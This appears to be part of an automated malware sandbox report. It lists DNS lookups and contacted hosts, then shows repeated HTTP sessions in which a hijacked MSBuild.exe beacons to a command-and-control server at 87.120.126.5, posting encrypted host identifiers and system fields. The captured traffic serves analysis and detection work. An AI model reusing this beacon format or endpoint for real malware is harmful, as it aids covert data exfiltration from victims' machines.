| Jan 3, 2025 23:20:12.718255997 CET | 1.1.1.1 | 192.168.2.4 | 0xc094 | No error (0) | bg.microsoft.map.fastly.net | | 199.232.210.172 | A (IP address) | IN (0x0001) | false |
| Jan 3, 2025 23:20:13.257496119 CET | 1.1.1.1 | 192.168.2.4 | 0x9c26 | No error (0) | fp2e7a.wpc.2be4.phicdn.net | fp2e7a.wpc.phicdn.net | | CNAME (Canonical name) | IN (0x0001) | false |
| Jan 3, 2025 23:20:13.257496119 CET | 1.1.1.1 | 192.168.2.4 | 0x9c26 | No error (0) | fp2e7a.wpc.phicdn.net | | 192.229.221.95 | A (IP address) | IN (0x0001) | false |
| Jan 3, 2025 23:20:26.347604036 CET | 1.1.1.1 | 192.168.2.4 | 0xb301 | No error (0) | fp2e7a.wpc.2be4.phicdn.net | fp2e7a.wpc.phicdn.net | | CNAME (Canonical name) | IN (0x0001) | false |
| Jan 3, 2025 23:20:26.347604036 CET | 1.1.1.1 | 192.168.2.4 | 0xb301 | No error (0) | fp2e7a.wpc.phicdn.net | | 192.229.221.95 | A (IP address) | IN (0x0001) | false |
| Jan 3, 2025 23:20:54.102775097 CET | 1.1.1.1 | 192.168.2.4 | 0x67a4 | No error (0) | shed.dual-low.s-part-0017.t-0009.t-msedge.net | s-part-0017.t-0009.t-msedge.net | | CNAME (Canonical name) | IN (0x0001) | false |
| Jan 3, 2025 23:20:54.102775097 CET | 1.1.1.1 | 192.168.2.4 | 0x67a4 | No error (0) | s-part-0017.t-0009.t-msedge.net | | 13.107.246.45 | A (IP address) | IN (0x0001) | false |
                                                                                                                    • bitbucket.org
                                                                                                                    • raw.githubusercontent.com
                                                                                                                    • bbuseruploads.s3.amazonaws.com
                                                                                                                    • 87.120.126.5
| Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process |
| --- | --- | --- | --- | --- | --- | --- |
| 0 | 192.168.2.4 | 49822 | 87.120.126.5 | 80 | 7256 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe |

Timestamp | Bytes transferred | Direction | Data
Jan 3, 2025 23:21:08.150535107 CET | 218 | OUT | POST /VmCetSC7/page.php HTTP/1.1
User-Agent: E9BC3BD76216AFA560BFB5ACAF5731A3
Content-Type: application/x-www-form-urlencoded
Host: 87.120.126.5
Content-Length: 471
Expect: 100-continue
Connection: Keep-Alive
Jan 3, 2025 23:21:08.521208048 CET | 471 | OUT | Data Raw: 69 64 3d 4f 6e 58 4e 6a 77 4f 36 54 32 77 34 47 7a 2f 4a 7e 69 4a 58 71 47 35 79 7a 4c 39 42 61 2f 78 7a 52 43 38 48 49 54 70 5a 58 4b 4d 53 64 37 6e 49 31 4f 74 37 61 48 65 78 50 4b 36 69 44 4c 32 6c 76 35 6c 37 33 6e 4d 73 38 79 57 65 62 63 38
Data Ascii: id=OnXNjwO6T2w4Gz/J~iJXqG5yzL9Ba/xzRC8HITpZXKMSd7nI1Ot7aHexPK6iDL2lv5l73nMs8yWebc8OKf/sgg==&os=b1~Ya6floynEjDOLJ6CTODXfxVYKZF2MUTe17DY4MXs=&pv=1KOnabZQRXT0NvIAsOUE/xkQBei0WVrvEyYSrzN8nuI=&ip=2vqG3mBrkO2lqdf3nhLMoREmTfnwYXlwGeoki4sIfCxeAm6~mybZ
Jan 3, 2025 23:21:08.745385885 CET | 25 | IN | HTTP/1.1 100 Continue
Jan 3, 2025 23:21:08.874341011 CET | 175 | IN | HTTP/1.1 200 OK
Server: nginx/1.22.1
Date: Fri, 03 Jan 2025 22:21:08 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


| Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process |
| --- | --- | --- | --- | --- | --- | --- |
| 1 | 192.168.2.4 | 49863 | 87.120.126.5 | 80 | 7256 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe |

Timestamp | Bytes transferred | Direction | Data
Jan 3, 2025 23:21:14.442074060 CET | 194 | OUT | POST /VmCetSC7/page.php HTTP/1.1
User-Agent: E9BC3BD76216AFA560BFB5ACAF5731A3
Content-Type: application/x-www-form-urlencoded
Host: 87.120.126.5
Content-Length: 471
Expect: 100-continue
Jan 3, 2025 23:21:14.789393902 CET | 471 | OUT | Data Raw: 69 64 3d 4f 6e 58 4e 6a 77 4f 36 54 32 77 34 47 7a 2f 4a 7e 69 4a 58 71 47 35 79 7a 4c 39 42 61 2f 78 7a 52 43 38 48 49 54 70 5a 58 4b 4d 53 64 37 6e 49 31 4f 74 37 61 48 65 78 50 4b 36 69 44 4c 32 6c 76 35 6c 37 33 6e 4d 73 38 79 57 65 62 63 38
Data Ascii: id=OnXNjwO6T2w4Gz/J~iJXqG5yzL9Ba/xzRC8HITpZXKMSd7nI1Ot7aHexPK6iDL2lv5l73nMs8yWebc8OKf/sgg==&os=b1~Ya6floynEjDOLJ6CTODXfxVYKZF2MUTe17DY4MXs=&pv=1KOnabZQRXT0NvIAsOUE/xkQBei0WVrvEyYSrzN8nuI=&ip=2vqG3mBrkO2lqdf3nhLMoREmTfnwYXlwGeoki4sIfCxeAm6~mybZ
Jan 3, 2025 23:21:15.044193029 CET | 25 | IN | HTTP/1.1 100 Continue
Jan 3, 2025 23:21:15.180600882 CET | 175 | IN | HTTP/1.1 200 OK
Server: nginx/1.22.1
Date: Fri, 03 Jan 2025 22:21:14 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


| Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process |
| --- | --- | --- | --- | --- | --- | --- |
| 2 | 192.168.2.4 | 49917 | 87.120.126.5 | 80 | 7256 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe |

Timestamp | Bytes transferred | Direction | Data
Jan 3, 2025 23:21:22.498044968 CET | 218 | OUT | POST /VmCetSC7/page.php HTTP/1.1
User-Agent: E9BC3BD76216AFA560BFB5ACAF5731A3
Content-Type: application/x-www-form-urlencoded
Host: 87.120.126.5
Content-Length: 471
Expect: 100-continue
Connection: Keep-Alive
Jan 3, 2025 23:21:22.857340097 CET | 471 | OUT | Data Raw: 69 64 3d 4f 6e 58 4e 6a 77 4f 36 54 32 77 34 47 7a 2f 4a 7e 69 4a 58 71 47 35 79 7a 4c 39 42 61 2f 78 7a 52 43 38 48 49 54 70 5a 58 4b 4d 53 64 37 6e 49 31 4f 74 37 61 48 65 78 50 4b 36 69 44 4c 32 6c 76 35 6c 37 33 6e 4d 73 38 79 57 65 62 63 38
Data Ascii: id=OnXNjwO6T2w4Gz/J~iJXqG5yzL9Ba/xzRC8HITpZXKMSd7nI1Ot7aHexPK6iDL2lv5l73nMs8yWebc8OKf/sgg==&os=b1~Ya6floynEjDOLJ6CTODXfxVYKZF2MUTe17DY4MXs=&pv=1KOnabZQRXT0NvIAsOUE/xkQBei0WVrvEyYSrzN8nuI=&ip=2vqG3mBrkO2lqdf3nhLMoREmTfnwYXlwGeoki4sIfCxeAm6~mybZ
Jan 3, 2025 23:21:23.424710035 CET | 25 | IN | HTTP/1.1 100 Continue
Jan 3, 2025 23:21:23.558291912 CET | 175 | IN | HTTP/1.1 200 OK
Server: nginx/1.22.1
Date: Fri, 03 Jan 2025 22:21:23 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


| Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process |
| --- | --- | --- | --- | --- | --- | --- |
| 3 | 192.168.2.4 | 50010 | 87.120.126.5 | 80 | 7256 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe |

Timestamp | Bytes transferred | Direction | Data
Jan 3, 2025 23:21:37.168098927 CET | 218 | OUT | POST /VmCetSC7/page.php HTTP/1.1
User-Agent: E9BC3BD76216AFA560BFB5ACAF5731A3
Content-Type: application/x-www-form-urlencoded
Host: 87.120.126.5
Content-Length: 471
Expect: 100-continue
Connection: Keep-Alive
Jan 3, 2025 23:21:37.523775101 CET | 471 | OUT | Data Raw: 69 64 3d 4f 6e 58 4e 6a 77 4f 36 54 32 77 34 47 7a 2f 4a 7e 69 4a 58 71 47 35 79 7a 4c 39 42 61 2f 78 7a 52 43 38 48 49 54 70 5a 58 4b 4d 53 64 37 6e 49 31 4f 74 37 61 48 65 78 50 4b 36 69 44 4c 32 6c 76 35 6c 37 33 6e 4d 73 38 79 57 65 62 63 38
Data Ascii: id=OnXNjwO6T2w4Gz/J~iJXqG5yzL9Ba/xzRC8HITpZXKMSd7nI1Ot7aHexPK6iDL2lv5l73nMs8yWebc8OKf/sgg==&os=b1~Ya6floynEjDOLJ6CTODXfxVYKZF2MUTe17DY4MXs=&pv=1KOnabZQRXT0NvIAsOUE/xkQBei0WVrvEyYSrzN8nuI=&ip=2vqG3mBrkO2lqdf3nhLMoREmTfnwYXlwGeoki4sIfCxeAm6~mybZ
Jan 3, 2025 23:21:37.758785009 CET | 25 | IN | HTTP/1.1 100 Continue
Jan 3, 2025 23:21:37.890394926 CET | 175 | IN | HTTP/1.1 200 OK
Server: nginx/1.22.1
Date: Fri, 03 Jan 2025 22:21:37 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


| Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process |
| --- | --- | --- | --- | --- | --- | --- |
| 4 | 192.168.2.4 | 50011 | 87.120.126.5 | 80 | 7256 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe |

Timestamp | Bytes transferred | Direction | Data
Jan 3, 2025 23:21:54.467031002 CET | 218 | OUT | POST /VmCetSC7/page.php HTTP/1.1
User-Agent: E9BC3BD76216AFA560BFB5ACAF5731A3
Content-Type: application/x-www-form-urlencoded
Host: 87.120.126.5
Content-Length: 471
Expect: 100-continue
Connection: Keep-Alive
Jan 3, 2025 23:21:54.821209908 CET | 471 | OUT | Data Raw: 69 64 3d 4f 6e 58 4e 6a 77 4f 36 54 32 77 34 47 7a 2f 4a 7e 69 4a 58 71 47 35 79 7a 4c 39 42 61 2f 78 7a 52 43 38 48 49 54 70 5a 58 4b 4d 53 64 37 6e 49 31 4f 74 37 61 48 65 78 50 4b 36 69 44 4c 32 6c 76 35 6c 37 33 6e 4d 73 38 79 57 65 62 63 38
Data Ascii: id=OnXNjwO6T2w4Gz/J~iJXqG5yzL9Ba/xzRC8HITpZXKMSd7nI1Ot7aHexPK6iDL2lv5l73nMs8yWebc8OKf/sgg==&os=b1~Ya6floynEjDOLJ6CTODXfxVYKZF2MUTe17DY4MXs=&pv=1KOnabZQRXT0NvIAsOUE/xkQBei0WVrvEyYSrzN8nuI=&ip=2vqG3mBrkO2lqdf3nhLMoREmTfnwYXlwGeoki4sIfCxeAm6~mybZ
Jan 3, 2025 23:21:55.080929041 CET | 25 | IN | HTTP/1.1 100 Continue
Jan 3, 2025 23:21:55.210479021 CET | 175 | IN | HTTP/1.1 200 OK
Server: nginx/1.22.1
Date: Fri, 03 Jan 2025 22:21:55 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
5 | 192.168.2.4 | 50012 | 87.120.126.5 | 80 | 7256 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Timestamp | Bytes transferred | Direction | Data
Jan 3, 2025 23:22:15.904340029 CET | 218 | OUT | POST /VmCetSC7/page.php HTTP/1.1
    User-Agent: E9BC3BD76216AFA560BFB5ACAF5731A3
    Content-Type: application/x-www-form-urlencoded
    Host: 87.120.126.5
    Content-Length: 471
    Expect: 100-continue
    Connection: Keep-Alive
Jan 3, 2025 23:22:16.258179903 CET | 471 | OUT | Data Raw: 69 64 3d 4f 6e 58 4e 6a 77 4f 36 54 32 77 34 47 7a 2f 4a 7e 69 4a 58 71 47 35 79 7a 4c 39 42 61 2f 78 7a 52 43 38 48 49 54 70 5a 58 4b 4d 53 64 37 6e 49 31 4f 74 37 61 48 65 78 50 4b 36 69 44 4c 32 6c 76 35 6c 37 33 6e 4d 73 38 79 57 65 62 63 38
    Data Ascii: id=OnXNjwO6T2w4Gz/J~iJXqG5yzL9Ba/xzRC8HITpZXKMSd7nI1Ot7aHexPK6iDL2lv5l73nMs8yWebc8OKf/sgg==&os=b1~Ya6floynEjDOLJ6CTODXfxVYKZF2MUTe17DY4MXs=&pv=1KOnabZQRXT0NvIAsOUE/xkQBei0WVrvEyYSrzN8nuI=&ip=2vqG3mBrkO2lqdf3nhLMoREmTfnwYXlwGeoki4sIfCxeAm6~mybZ
Jan 3, 2025 23:22:16.502264023 CET | 25 | IN | HTTP/1.1 100 Continue
Jan 3, 2025 23:22:16.806046963 CET | 175 | IN | HTTP/1.1 200 OK
    Server: nginx/1.22.1
    Date: Fri, 03 Jan 2025 22:22:16 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: keep-alive
    Data Raw: 30 0d 0a 0d 0a
    Data Ascii: 0
Jan 3, 2025 23:22:16.843585014 CET | 175 | IN | HTTP/1.1 200 OK
    Server: nginx/1.22.1
    Date: Fri, 03 Jan 2025 22:22:16 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: keep-alive
    Data Raw: 30 0d 0a 0d 0a
    Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
6 | 192.168.2.4 | 50013 | 87.120.126.5 | 80 | 7256 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Timestamp | Bytes transferred | Direction | Data
Jan 3, 2025 23:22:26.373194933 CET | 218 | OUT | POST /VmCetSC7/page.php HTTP/1.1
    User-Agent: E9BC3BD76216AFA560BFB5ACAF5731A3
    Content-Type: application/x-www-form-urlencoded
    Host: 87.120.126.5
    Content-Length: 471
    Expect: 100-continue
    Connection: Keep-Alive
Jan 3, 2025 23:22:26.728207111 CET | 471 | OUT | Data Raw: 69 64 3d 4f 6e 58 4e 6a 77 4f 36 54 32 77 34 47 7a 2f 4a 7e 69 4a 58 71 47 35 79 7a 4c 39 42 61 2f 78 7a 52 43 38 48 49 54 70 5a 58 4b 4d 53 64 37 6e 49 31 4f 74 37 61 48 65 78 50 4b 36 69 44 4c 32 6c 76 35 6c 37 33 6e 4d 73 38 79 57 65 62 63 38
    Data Ascii: id=OnXNjwO6T2w4Gz/J~iJXqG5yzL9Ba/xzRC8HITpZXKMSd7nI1Ot7aHexPK6iDL2lv5l73nMs8yWebc8OKf/sgg==&os=b1~Ya6floynEjDOLJ6CTODXfxVYKZF2MUTe17DY4MXs=&pv=1KOnabZQRXT0NvIAsOUE/xkQBei0WVrvEyYSrzN8nuI=&ip=2vqG3mBrkO2lqdf3nhLMoREmTfnwYXlwGeoki4sIfCxeAm6~mybZ
Jan 3, 2025 23:22:26.964682102 CET | 25 | IN | HTTP/1.1 100 Continue
Jan 3, 2025 23:22:27.098423004 CET | 175 | IN | HTTP/1.1 200 OK
    Server: nginx/1.22.1
    Date: Fri, 03 Jan 2025 22:22:26 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: keep-alive
    Data Raw: 30 0d 0a 0d 0a
    Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
7 | 192.168.2.4 | 50014 | 87.120.126.5 | 80 | 7256 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Timestamp | Bytes transferred | Direction | Data
Jan 3, 2025 23:22:43.107999086 CET | 218 | OUT | POST /VmCetSC7/page.php HTTP/1.1
    User-Agent: E9BC3BD76216AFA560BFB5ACAF5731A3
    Content-Type: application/x-www-form-urlencoded
    Host: 87.120.126.5
    Content-Length: 471
    Expect: 100-continue
    Connection: Keep-Alive
Jan 3, 2025 23:22:43.461318016 CET | 471 | OUT | Data Raw: 69 64 3d 4f 6e 58 4e 6a 77 4f 36 54 32 77 34 47 7a 2f 4a 7e 69 4a 58 71 47 35 79 7a 4c 39 42 61 2f 78 7a 52 43 38 48 49 54 70 5a 58 4b 4d 53 64 37 6e 49 31 4f 74 37 61 48 65 78 50 4b 36 69 44 4c 32 6c 76 35 6c 37 33 6e 4d 73 38 79 57 65 62 63 38
    Data Ascii: id=OnXNjwO6T2w4Gz/J~iJXqG5yzL9Ba/xzRC8HITpZXKMSd7nI1Ot7aHexPK6iDL2lv5l73nMs8yWebc8OKf/sgg==&os=b1~Ya6floynEjDOLJ6CTODXfxVYKZF2MUTe17DY4MXs=&pv=1KOnabZQRXT0NvIAsOUE/xkQBei0WVrvEyYSrzN8nuI=&ip=2vqG3mBrkO2lqdf3nhLMoREmTfnwYXlwGeoki4sIfCxeAm6~mybZ
Jan 3, 2025 23:22:43.714971066 CET | 25 | IN | HTTP/1.1 100 Continue
Jan 3, 2025 23:22:44.018284082 CET | 175 | IN | HTTP/1.1 200 OK
    Server: nginx/1.22.1
    Date: Fri, 03 Jan 2025 22:22:43 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: keep-alive
    Data Raw: 30 0d 0a 0d 0a
    Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
8 | 192.168.2.4 | 50015 | 87.120.126.5 | 80 | 7256 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Timestamp | Bytes transferred | Direction | Data
Jan 3, 2025 23:22:56.982426882 CET | 218 | OUT | POST /VmCetSC7/page.php HTTP/1.1
    User-Agent: E9BC3BD76216AFA560BFB5ACAF5731A3
    Content-Type: application/x-www-form-urlencoded
    Host: 87.120.126.5
    Content-Length: 471
    Expect: 100-continue
    Connection: Keep-Alive
Jan 3, 2025 23:22:57.336338043 CET | 471 | OUT | Data Raw: 69 64 3d 4f 6e 58 4e 6a 77 4f 36 54 32 77 34 47 7a 2f 4a 7e 69 4a 58 71 47 35 79 7a 4c 39 42 61 2f 78 7a 52 43 38 48 49 54 70 5a 58 4b 4d 53 64 37 6e 49 31 4f 74 37 61 48 65 78 50 4b 36 69 44 4c 32 6c 76 35 6c 37 33 6e 4d 73 38 79 57 65 62 63 38
    Data Ascii: id=OnXNjwO6T2w4Gz/J~iJXqG5yzL9Ba/xzRC8HITpZXKMSd7nI1Ot7aHexPK6iDL2lv5l73nMs8yWebc8OKf/sgg==&os=b1~Ya6floynEjDOLJ6CTODXfxVYKZF2MUTe17DY4MXs=&pv=1KOnabZQRXT0NvIAsOUE/xkQBei0WVrvEyYSrzN8nuI=&ip=2vqG3mBrkO2lqdf3nhLMoREmTfnwYXlwGeoki4sIfCxeAm6~mybZ
Jan 3, 2025 23:22:57.591558933 CET | 25 | IN | HTTP/1.1 100 Continue
Jan 3, 2025 23:22:57.720423937 CET | 175 | IN | HTTP/1.1 200 OK
    Server: nginx/1.22.1
    Date: Fri, 03 Jan 2025 22:22:57 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: keep-alive
    Data Raw: 30 0d 0a 0d 0a
    Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
9 | 192.168.2.4 | 50016 | 87.120.126.5 | 80 | 7256 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Timestamp | Bytes transferred | Direction | Data
Jan 3, 2025 23:23:09.045113087 CET | 218 | OUT | POST /VmCetSC7/page.php HTTP/1.1
    User-Agent: E9BC3BD76216AFA560BFB5ACAF5731A3
    Content-Type: application/x-www-form-urlencoded
    Host: 87.120.126.5
    Content-Length: 471
    Expect: 100-continue
    Connection: Keep-Alive
Jan 3, 2025 23:23:09.398834944 CET | 471 | OUT | Data Raw: 69 64 3d 4f 6e 58 4e 6a 77 4f 36 54 32 77 34 47 7a 2f 4a 7e 69 4a 58 71 47 35 79 7a 4c 39 42 61 2f 78 7a 52 43 38 48 49 54 70 5a 58 4b 4d 53 64 37 6e 49 31 4f 74 37 61 48 65 78 50 4b 36 69 44 4c 32 6c 76 35 6c 37 33 6e 4d 73 38 79 57 65 62 63 38
    Data Ascii: id=OnXNjwO6T2w4Gz/J~iJXqG5yzL9Ba/xzRC8HITpZXKMSd7nI1Ot7aHexPK6iDL2lv5l73nMs8yWebc8OKf/sgg==&os=b1~Ya6floynEjDOLJ6CTODXfxVYKZF2MUTe17DY4MXs=&pv=1KOnabZQRXT0NvIAsOUE/xkQBei0WVrvEyYSrzN8nuI=&ip=2vqG3mBrkO2lqdf3nhLMoREmTfnwYXlwGeoki4sIfCxeAm6~mybZ
Jan 3, 2025 23:23:09.654040098 CET | 25 | IN | HTTP/1.1 100 Continue
Jan 3, 2025 23:23:09.782094955 CET | 175 | IN | HTTP/1.1 200 OK
    Server: nginx/1.22.1
    Date: Fri, 03 Jan 2025 22:23:09 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: keep-alive
    Data Raw: 30 0d 0a 0d 0a
    Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
10 | 192.168.2.4 | 50017 | 87.120.126.5 | 80 | 7256 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Timestamp | Bytes transferred | Direction | Data
Jan 3, 2025 23:23:25.921148062 CET | 218 | OUT | POST /VmCetSC7/page.php HTTP/1.1
    User-Agent: E9BC3BD76216AFA560BFB5ACAF5731A3
    Content-Type: application/x-www-form-urlencoded
    Host: 87.120.126.5
    Content-Length: 471
    Expect: 100-continue
    Connection: Keep-Alive
Jan 3, 2025 23:23:26.273931980 CET | 471 | OUT | Data Raw: 69 64 3d 4f 6e 58 4e 6a 77 4f 36 54 32 77 34 47 7a 2f 4a 7e 69 4a 58 71 47 35 79 7a 4c 39 42 61 2f 78 7a 52 43 38 48 49 54 70 5a 58 4b 4d 53 64 37 6e 49 31 4f 74 37 61 48 65 78 50 4b 36 69 44 4c 32 6c 76 35 6c 37 33 6e 4d 73 38 79 57 65 62 63 38
    Data Ascii: id=OnXNjwO6T2w4Gz/J~iJXqG5yzL9Ba/xzRC8HITpZXKMSd7nI1Ot7aHexPK6iDL2lv5l73nMs8yWebc8OKf/sgg==&os=b1~Ya6floynEjDOLJ6CTODXfxVYKZF2MUTe17DY4MXs=&pv=1KOnabZQRXT0NvIAsOUE/xkQBei0WVrvEyYSrzN8nuI=&ip=2vqG3mBrkO2lqdf3nhLMoREmTfnwYXlwGeoki4sIfCxeAm6~mybZ
Jan 3, 2025 23:23:26.562422037 CET | 25 | IN | HTTP/1.1 100 Continue
Jan 3, 2025 23:23:26.993798018 CET | 175 | IN | HTTP/1.1 200 OK
    Server: nginx/1.22.1
    Date: Fri, 03 Jan 2025 22:23:26 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: keep-alive
    Data Raw: 30 0d 0a 0d 0a
    Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
11 | 192.168.2.4 | 50018 | 87.120.126.5 | 80 | 7256 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Timestamp | Bytes transferred | Direction | Data
Jan 3, 2025 23:23:33.529773951 CET | 218 | OUT | POST /VmCetSC7/page.php HTTP/1.1
    User-Agent: E9BC3BD76216AFA560BFB5ACAF5731A3
    Content-Type: application/x-www-form-urlencoded
    Host: 87.120.126.5
    Content-Length: 471
    Expect: 100-continue
    Connection: Keep-Alive
Jan 3, 2025 23:23:33.889066935 CET | 471 | OUT | Data Raw: 69 64 3d 4f 6e 58 4e 6a 77 4f 36 54 32 77 34 47 7a 2f 4a 7e 69 4a 58 71 47 35 79 7a 4c 39 42 61 2f 78 7a 52 43 38 48 49 54 70 5a 58 4b 4d 53 64 37 6e 49 31 4f 74 37 61 48 65 78 50 4b 36 69 44 4c 32 6c 76 35 6c 37 33 6e 4d 73 38 79 57 65 62 63 38
    Data Ascii: id=OnXNjwO6T2w4Gz/J~iJXqG5yzL9Ba/xzRC8HITpZXKMSd7nI1Ot7aHexPK6iDL2lv5l73nMs8yWebc8OKf/sgg==&os=b1~Ya6floynEjDOLJ6CTODXfxVYKZF2MUTe17DY4MXs=&pv=1KOnabZQRXT0NvIAsOUE/xkQBei0WVrvEyYSrzN8nuI=&ip=2vqG3mBrkO2lqdf3nhLMoREmTfnwYXlwGeoki4sIfCxeAm6~mybZ
Jan 3, 2025 23:23:34.166520119 CET | 25 | IN | HTTP/1.1 100 Continue
Jan 3, 2025 23:23:34.290971994 CET | 175 | IN | HTTP/1.1 200 OK
    Server: nginx/1.22.1
    Date: Fri, 03 Jan 2025 22:23:34 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: keep-alive
    Data Raw: 30 0d 0a 0d 0a
    Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
12 | 192.168.2.4 | 50019 | 87.120.126.5 | 80 | 7256 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Timestamp | Bytes transferred | Direction | Data
Jan 3, 2025 23:23:49.572565079 CET | 218 | OUT | POST /VmCetSC7/page.php HTTP/1.1
    User-Agent: E9BC3BD76216AFA560BFB5ACAF5731A3
    Content-Type: application/x-www-form-urlencoded
    Host: 87.120.126.5
    Content-Length: 471
    Expect: 100-continue
    Connection: Keep-Alive
Jan 3, 2025 23:23:49.932035923 CET | 471 | OUT | Data Raw: 69 64 3d 4f 6e 58 4e 6a 77 4f 36 54 32 77 34 47 7a 2f 4a 7e 69 4a 58 71 47 35 79 7a 4c 39 42 61 2f 78 7a 52 43 38 48 49 54 70 5a 58 4b 4d 53 64 37 6e 49 31 4f 74 37 61 48 65 78 50 4b 36 69 44 4c 32 6c 76 35 6c 37 33 6e 4d 73 38 79 57 65 62 63 38
    Data Ascii: id=OnXNjwO6T2w4Gz/J~iJXqG5yzL9Ba/xzRC8HITpZXKMSd7nI1Ot7aHexPK6iDL2lv5l73nMs8yWebc8OKf/sgg==&os=b1~Ya6floynEjDOLJ6CTODXfxVYKZF2MUTe17DY4MXs=&pv=1KOnabZQRXT0NvIAsOUE/xkQBei0WVrvEyYSrzN8nuI=&ip=2vqG3mBrkO2lqdf3nhLMoREmTfnwYXlwGeoki4sIfCxeAm6~mybZ
Jan 3, 2025 23:23:50.671550989 CET | 200 | IN | HTTP/1.1 100 Continue
    Data Raw: 48 54 54 50 2f 31 2e 31 20 32 30 30 20 4f 4b 0d 0a 53 65 72 76 65 72 3a 20 6e 67 69 6e 78 2f 31 2e 32 32 2e 31 0d 0a 44 61 74 65 3a 20 46 72 69 2c 20 30 33 20 4a 61 6e 20 32 30 32 35 20 32 32 3a 32 33 3a 35 30 20 47 4d 54 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 0d 0a 54 72 61 6e 73 66 65 72 2d 45 6e 63 6f 64 69 6e 67 3a 20 63 68 75 6e 6b 65 64 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 6b 65 65 70 2d 61 6c 69 76 65 0d 0a 0d 0a 30 0d 0a 0d 0a
    Data Ascii: HTTP/1.1 200 OKServer: nginx/1.22.1Date: Fri, 03 Jan 2025 22:23:50 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: keep-alive0


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                    13192.168.2.45002087.120.126.5807256C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    Jan 3, 2025 23:24:00.811736107 CET218OUTPOST /VmCetSC7/page.php HTTP/1.1
                                                                                                                    User-Agent: E9BC3BD76216AFA560BFB5ACAF5731A3
                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                    Host: 87.120.126.5
                                                                                                                    Content-Length: 471
                                                                                                                    Expect: 100-continue
                                                                                                                    Connection: Keep-Alive
Jan 3, 2025 23:24:01.164522886 CET | 471 | OUT | Data Raw: 69 64 3d 4f 6e 58 4e 6a 77 4f 36 54 32 77 34 47 7a 2f 4a 7e 69 4a 58 71 47 35 79 7a 4c 39 42 61 2f 78 7a 52 43 38 48 49 54 70 5a 58 4b 4d 53 64 37 6e 49 31 4f 74 37 61 48 65 78 50 4b 36 69 44 4c 32 6c 76 35 6c 37 33 6e 4d 73 38 79 57 65 62 63 38
                                                                                                                    Data Ascii: id=OnXNjwO6T2w4Gz/J~iJXqG5yzL9Ba/xzRC8HITpZXKMSd7nI1Ot7aHexPK6iDL2lv5l73nMs8yWebc8OKf/sgg==&os=b1~Ya6floynEjDOLJ6CTODXfxVYKZF2MUTe17DY4MXs=&pv=1KOnabZQRXT0NvIAsOUE/xkQBei0WVrvEyYSrzN8nuI=&ip=2vqG3mBrkO2lqdf3nhLMoREmTfnwYXlwGeoki4sIfCxeAm6~mybZ
Jan 3, 2025 23:24:01.422911882 CET | 25 | IN | HTTP/1.1 100 Continue
Jan 3, 2025 23:24:01.554022074 CET | 175 | IN | HTTP/1.1 200 OK
                                                                                                                    Server: nginx/1.22.1
                                                                                                                    Date: Fri, 03 Jan 2025 22:24:01 GMT
                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                    Transfer-Encoding: chunked
                                                                                                                    Connection: keep-alive
